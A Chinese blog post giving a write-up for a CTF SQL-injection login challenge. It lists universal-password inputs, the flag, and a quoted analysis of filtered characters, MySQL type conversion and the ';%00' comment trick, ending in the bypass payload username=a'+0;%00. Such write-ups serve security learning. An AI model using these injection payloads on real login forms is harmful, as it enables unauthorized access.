实验吧登陆一下好吗 WP

分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow

也欢迎大家转载本篇文章。分享知识,造福人民,实现我们中华民族伟大复兴!

                       

登陆一下好吗??(http://www.shiyanbar.com/ctf/1942
 username= 1’=’0 
password= 1’=’0 
或者
 username=what’=’
password=what’=’ 
或者
username:admin’=’
password:admin’=’ 
得到ctf{51d1bf8fb65a8c2406513ee8f52283e7} 
好吧,其实我提供的只是万能密码尝试而已,真正的writeup在这里(by wonderkun,侵删):

根据题目的提示,获知该题目的目的使用sql注入来绕过登陆。

猜测后台的sql应该是

select * from table where username= ‘usernameandpassword=password’

进过测试,发现过滤了以下字符

| , – ,  or , union , # , select ,* ,/ 

这写字符没办法绕过。

但是为了登陆成功,需要让  sql语句返回true。

除了pact想到的同双等号绕外,还有一种方法,主要用到以下两个技巧:

第一: mysql的数据类型转换特性。 
这里写图片描述
 通过这个图,应该可以看明白啦, user是一个字符串类型的,当他接受到一个整型值切值为0的时候,就会返回数据库的所有条目。  一个字符串加一个整形,会自动的变量类型转换,变为一个整型。

所以,只需要让sql执行

select * from table where username=’a’+0;

就可以返回一个ture了,但是你会发现注释符全部过滤啦,后面的部分去不掉,这时候你需要知道下面的姿势。

第二: mysql的注释符除了  

– + , # ,/**/ 之外,还有一个 ;%00 ,很多人都不知道最后一个。

所以最后的payload 是这样的: username=a’+0;%00&password= 
这里写图片描述

           

给我老师的人工智能教程打call!http://blog.csdn.net/jiangjunshow
这里写图片描述
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值